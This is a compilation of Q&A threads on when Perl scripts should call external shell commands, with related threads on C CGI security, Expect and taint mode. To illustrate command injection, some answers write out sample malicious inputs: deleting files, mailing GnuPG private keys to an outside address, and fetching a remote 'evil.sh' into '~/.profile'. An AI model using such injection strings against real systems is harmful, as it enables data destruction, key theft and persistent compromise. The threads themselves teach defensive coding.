Using system commands in Perl instead of built in libraries/functions [duplicate] - perl

This question already has an answer here:
Using Perl modules vs. using system() calls
(1 answer)
Closed 9 years ago.
On occasion I see people calling the system grep from Perl (and other scripting languages for that matter) instead of using the built-in language facilities/libraries to parse files. I would like to encourage people to use the built-in facilities and I want to solicit some reasons as to why it is good practice to use the built-in tools. I can think of some such as
Using libraries/language facilities is faster. Performance suffers due to the overhead of executing external commands.
Sticking to language facilities is more portable.
any other reasons?
On the other side of the coin, are there ever reasons to favour using system commands instead of the built-in language facilities? On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?

Actually, when it matters, a specialized tool can be faster.
The real gains of keeping the work in Perl are:
Portability (even between machines with the same OS).
Ease of error detection.
Flexibility in handling of errors.
Greater customizability/flexibility.
Fewer "moving parts". (Are you sure you correctly escaped everything and setup the environment correctly?)
Less expertise needed. (You don't need to know both Perl and the external tools (and their ports) to code and maintain the program.)
On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?
Possibly. You can configure some shells to exit if any program returns an unsuccessful error code. This can make some scripts quite robust. For example, I have a couple of bash scripts featuring the line
trap 'e=$? ; echo "Error." ; exit $e' ERR

"On the other side of the coin, are there ever reasons to favour using system commands instead of the built-in language facilities? On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?"
Risking the wrath of Perl hardliners here. But for me there is an easy reason to use system grep instead of perl grep: I know its syntax.
Same reason to use a Perl script instead of a bash script: I know how to do stuff in Perl and never bothered with bash script syntax.
And as we are talking scripts here, my main concern is getting it done fast and reliable (and readable). At work i do not have to bother with portability as all production is done on the very same system, down to the same software versions of everything for the whole product lifespan.
At home i do not have to care about lifetime or whatever either as the script most likely is single-purpose.
And in neither case i care about performance or software security as i would be using C++ or something else for commercial software or in time or memory limited scenarios.
edit: Not saying these reasons would apply to anyone, or even anyone else. But while in reality i know how to use Perls grep, i really have no idea how to write a bash script and most likely never will. Just putting a few lines in Perl is always faster for me.

Using external tools lead to do more error.
Moreover you have you to parse the results (if any) of the external command, which is an other source of error.
No need to say that it is bad in terms of security.

Related

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see just off hand, you are using the "system()" call directly on <the_message> ; Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account#hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;
A slightly deeper look
Okay so what's going on in terms of using C; Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with main focus on C for last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyways and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project I had to debug and harden and augment it because it had some horrible buffer over flow issues left right and center, non-existant utf-8 support and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;
The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.
Those are my thoughts; I hope that you will

Executing system commands safely while coding in Perl

Should one really use external commands while coding in Perl? I see several disadvantages of it. It's not system independent plus security risks might also be there. What do you think? If there is no way and you have to use the shell commands from Perl then what is the safest way to execute that particular command (like checking pid, uid etc)?
It depends on how hard it is going to be to replicate the functionality in Perl. If I needed to run the m4 macro processor on something, I'd not think of trying to replicate that functionality in Perl myself, and since there's no module on http://search.cpan.org/ that looks suitable, it would appear others agree with me. In that case, then, using the external program is sensible. On the other hand, if I needed to read the contents of a directory, then the combination of readdir() et al plus stat() or lstat() inside Perl is more sensible than futzing with the output of ls.
If you need to execute commands, think very carefully about how you invoke them. In particular, you probably want to avoid the shell interpreting the arguments, so use the array form of system (see also exec), etc, rather than a single string for the command plus arguments (which means the shell is used to process the command line).
Executing external commands can be expensive simply because it involves forking new process and watching for its output if you need it.
Probably more importantly, should external process fail for any reason, it may be difficult to understand what happened by means of your script. Worse still, surprisingly often external process can be stuck forever, so will be your script. You can use special tricks like opening pipe and watching for output in loop, but this itself is error-prone.
Perl is very capable of doing many things. So, if you stick to using only Perl native constructs and modules to accomplish your tasks, not only it will be faster because you never fork, but it will be more reliable and easier to catch errors by looking at native Perl objects and structures returned by library routines. And of course, it will be automatically portable to different platforms.
If your script runs under elevated permissions (like root or under sudo), you should be very careful as to what external programs you execute. One of the simple ways to ensure basic security is to always specify commands by full name, like /usr/bin/grep (but still think twice and just do grep by Perl itself!). However, even this may not be enough if attacker is using LD_PRELOAD mechanism to inject rogue shared libraries.
If you are willing to go very secure, it is suggested to use tainted check by using -T flag like this:
#!/usr/bin/perl -T
Taint flag will be also enabled by Perl automatically if your script was determined to have different real and effective user or group ids.
Tainted mode will severely limit your ability to do many things (like system() call) without Perl complaining - see more at http://perldoc.perl.org/perlsec.html#Taint-mode, but it will give you much higher security confidence.
Should one really use external commands while coding in Perl?
There's no single answer to this question. It all depends on what you are doing within the wide range of potential uses of Perl.
Are you using Perl as a glorified shell script on your local machine, or just trying to find a quick-and-dirty solution to your problem? In that case, it makes a lot of sense to run system commands if that is the easiest way to accomplish your task. Security and speed are not that important; what matters is the ability to code quickly.
On the other hand, are you writing a production program? In that case, you want secure, portable, efficient code. It is often preferable to write the functionality in Perl (or use a module), rather than calling an external program. At least, you should think hard about the benefits and drawbacks.

Are there any tools like Closure Compiler for compression and optimization of Perl/CGI?

I am trying to find some online tool for compressing and optimizing my perl. Is there any benefit to removal of (at a minimum) whitespace and comments from server side cgi?
Perl source undergoes a compilation phase, it is not directly interpreted. Perl code is executed at the server, not delivered to the client. Unlike JavaScript, there is no benefit from minimisation.
If you want to optimise, measure first where the bottle-neck is. I presume that switching from CGI to a persistent technology will give you a big pay-off.
Related:
How can I compile my Perl script so to reduce startup time?
How can I reduce Perl CGI script start-up time?
Edit:
You mention in a comment that you deploy on Apache httpd. To reduce start-up time without changing existing code, install mod_perl2 and run your CGI programs with the perl-script handler. In the long term, switch over your code base from CGI to PSGI and deploy on Plack::Handler::Apache2, or preferably, if you also have an FastCGI adapter for the web server, Plack::Handler::Net::FastCGI.
Perltidy is a free pretty-printer with a lot of options. Some of them might do what you want in some way, remove whitespace for instance. It's not a minifier, but good to know nevertheless, I'd recommend to add it to your toolchest

How can I control an interactive Unix application programmatically through Perl?

I have inherited a 20-year-old interactive command-line unix application that is no longer supported by its vendor. We need to automate some tasks in this application.
The most troublesome of these is creating thousands of new records with slightly different parameters (e.g. different identifiers, different names). The records have to be created in sequence, one at a time, which would take many months (and therefore dollars) to do manually. In most cases, creating a record has a very predictable pattern of keying in commands, reading responses, keying in further commands, etc. However, some record creation operations will result in error conditions ('record with this identifier already exists') that require a different set of commands to be exit gracefully.
I can see a few different ways to do this:
Named pipes. Write a Perl script that runs the target application with STDIN and STDOUT set to named pipes then sends the target application the sequence of commands to create a record with the required parameters, and then instructs the target application to exit and shut down. We then run the script as many times as required with different parameters.
Application. Find another Unix tool that can be used to script interactive programs. The only ones I have been able to find though are expect, but this does not seem top be maintained; and chat, which I recall from ages ago, and which seems to do more-or-less what I want, but appears to be only for controlling modems.
One more potential complication: I think the target application was written for a VT100 terminal and it uses some sort of escape sequences to do things like provide highlighting.
My question is what approach should I take? One of these, or something completely different? I quite like the idea of using named pipes and then having a Perl script that opens the FIFOs and reads and writes as required, as it provides a lot of flexibility, but from what I have read it seems like there's a lot of potential problems if I go down this path.
Thanks in advance.
I'd definitely stick to Perl for the extra flexibility, as chaos suggested. Are you aware of the Expect perl module? It's a lot nicer than the named pipe approach.
Note also with named pipes, you can't force the output coming back from your legacy application to be unbuffered, which could be annoying. I think Expect.pm uses pseudo-ttys to get around this problem, but I'm not sure. See the discussion in perlipc in the section "Bidirectional Communication with Another Process" for more details.
expect is a lot more solid than you're probably giving it credit for, but if I were you I'd still go with the Perl option, wanting to have a full and familiar programming language for managing the process and having confidence that whatever weird issues arise, there will be ways of addressing them.
Expect, either with the Tcl or Perl implementations, would be my first attempt. If you are seeing odd sequences in the output because it's doing odd terminal things, just filter those from the output before you do your matching.
With named pipes, you're going to end up reinventing Expect anyway.

Why shouldn't I use shell tools in Perl code?

It is generally advised not to use additional linux tools in a Perl code;
e.g if someone intends to print the last line of a text file he can:
$last_line = `tail -1 $file` ;
or otherwise, open the file and read it line by line
open(INFO,$file);
while(<INFO>) {
$last_line = $_ if eof;
}
What are the pitfalls of using the previous and why should I avoid using shell tools in my code?
thanx,
Efficiency - you don't have to spawn a new process
Portability - you don't have to worry about an executable not existing, accepting different switches, or having different output
Ease of use - you don't have to parse the output, the results are already in a usable form
Error handling - you have finer-grained control over errors and what to do about them in Perl.
It's better to keep all the action in Perl because it's faster and because it's more secure. It's faster because you're not spawning a new process, and it's more secure because you don't have to worry about shell meta character trickery.
For example, in your first case if $file contained "afilename ; rm -rf ~" you would be a very unhappy camper.
P.S. The best all-Perlway to do the tail is to use File::ReadBackwards
One of the primary reasons (besides portability) for not executing shell commands is that it introduces overhead by spawning another process. That's why much of the same functionality is available via CPAN in Perl modules.
One reason is that your Perl code might be running in an environment where there is no shell tool called 'tail'.
It's a personal call depending on the project:
Is it going to be always used in shell environments with tail?
Do you care about only using pure Perl code?
Using tail? Fine. But that's really a special case, since it's so easy to use and since it is so trivial.
The problem in general is not really efficiency or portability, that is largely irrelevant; the issue is ease of use. To run an external utility, you have to find out what arguments it accepts, write code to transform your program's data structures to that format, quote them properly, build the command line, and run the application. Then, you might have to feed it data and read data from it (involving complexity like an event loop, worrying about deadlocking, etc.), and finally interpret the return value. (UNIX processes consider "0" true and anything else false, but Perl assumes the opposite. foo() and die is hard to read.) This is a lot of work to do, and that's why people avoid it. It's much easier to create an instance of a class and call methods on it to get the data you need.
(You can abstract away processes this way; see Crypt::GpgME for example. It handles the complexity associated with invoking gpg, which would normally involve creating multiple filehandles other than STDOUT, STDIN, and STDERR, among other things.)
The main reason I see for doing it all in Perl would be for robustness. Your use of tail will fail if the filename has shell metacharacters or spaces or doesn't exist or isn't accessible. From Perl, characters in the filename aren't an issue, and you can distinguish between errors in accessing the file. Sometimes being robust is more important than speedy coding and sometimes it's not.